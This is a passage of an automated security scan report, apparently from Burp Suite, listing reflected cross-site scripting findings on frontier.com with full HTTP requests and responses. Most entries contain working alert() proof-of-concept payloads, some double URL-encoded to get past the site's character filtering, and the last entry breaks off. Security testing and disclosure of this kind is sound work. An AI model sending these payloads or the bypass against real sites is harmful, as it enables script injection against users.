
Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 476a4'%3balert(1)//9376138f416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 476a4';alert(1)//9376138f416 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167?476a4'%3balert(1)//9376138f416=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167?476a4';alert(1)//9376138f416=1');//]]>
...[SNIP]...

2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 was submitted in the REST URL parameter 1. This input was echoed as 9f242';alert(1)//a3ed4687c09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e11679f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e11679f242';alert(1)//a3ed4687c09');//]]>
...[SNIP]...

2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0230'%3balert(1)//e42e942ef78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0230';alert(1)//e42e942ef78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167?a0230'%3balert(1)//e42e942ef78=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e1167?a0230';alert(1)//e42e942ef78=1');//]]>
...[SNIP]...

2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a972%2527%253balert%25281%2529%252f%252f878740809af was submitted in the REST URL parameter 2. This input was echoed as 4a972';alert(1)//878740809af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /Controls/SharedWebMethods.aspx4a972%2527%253balert%25281%2529%252f%252f878740809af/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Content-Length: 12
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Pragma: no-cache
Cache-Control: no-cache

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/SharedWebMethods.aspx4a972';alert(1)//878740809af/GetCurrentLocale');//]]>
...[SNIP]...

2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7979'%3bfb5ed37a6ba was submitted in the REST URL parameter 1. This input was echoed as f7979';fb5ed37a6ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controlsf7979'%3bfb5ed37a6ba/VirtualCode.ashx?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsf7979';fb5ed37a6ba/VirtualCode.ashx');//]]>
...[SNIP]...

2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb66e%2527%253balert%25281%2529%252f%252f3775dfb9153 was submitted in the REST URL parameter 2. This input was echoed as cb66e';alert(1)//3775dfb9153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashxcb66e%2527%253balert%25281%2529%252f%252f3775dfb9153?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/VirtualCode.ashxcb66e';alert(1)//3775dfb9153?pageid=73&origPath=/topNav.css/');//]]>
...[SNIP]...

2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d86%2527%253balert%25281%2529%252f%252f44493412d91 was submitted in the REST URL parameter 1. This input was echoed as c3d86';alert(1)//44493412d91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Imagesc3d86%2527%253balert%25281%2529%252f%252f44493412d91/Common/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Imagesc3d86';alert(1)//44493412d91/Common/form_bg.gif');//]]>
...[SNIP]...

2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7 was submitted in the REST URL parameter 2. This input was echoed as 80d1c';alert(1)//47a4aeee6e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/Common80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common80d1c';alert(1)//47a4aeee6e7/form_bg.gif');//]]>
...[SNIP]...

2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 was submitted in the REST URL parameter 3. This input was echoed as 970f4';alert(1)//f20c2fa2242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/Common/form_bg.gif970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif970f4';alert(1)//f20c2fa2242');//]]>
...[SNIP]...

2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b56f6'%3balert(1)//227d16cdf97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b56f6';alert(1)//227d16cdf97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Images/Common/form_bg.gif?b56f6'%3balert(1)//227d16cdf97=1 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif?b56f6';alert(1)//227d16cdf97=1');//]]>
...[SNIP]...

2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fpsearchlg.asp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17124%2527%253balert%25281%2529%252f%252fdf531ca5181 was submitted in the REST URL parameter 1. This input was echoed as 17124';alert(1)//df531ca5181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo17124%2527%253balert%25281%2529%252f%252fdf531ca5181/fpsearchlg.asp?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo17124';alert(1)//df531ca5181/fpsearchlg.asp?type=biz');//]]>
...[SNIP]...

2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fpsearchlg.asp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b was submitted in the REST URL parameter 2. This input was echoed as a4f61';alert(1)//5fb1c88860b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fpsearchlg.aspa4f61';alert(1)//5fb1c88860b?type=biz');//]]>
...[SNIP]...

2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d70'%3b8506878fe2 was submitted in the REST URL parameter 1. This input was echoed as 69d70';8506878fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

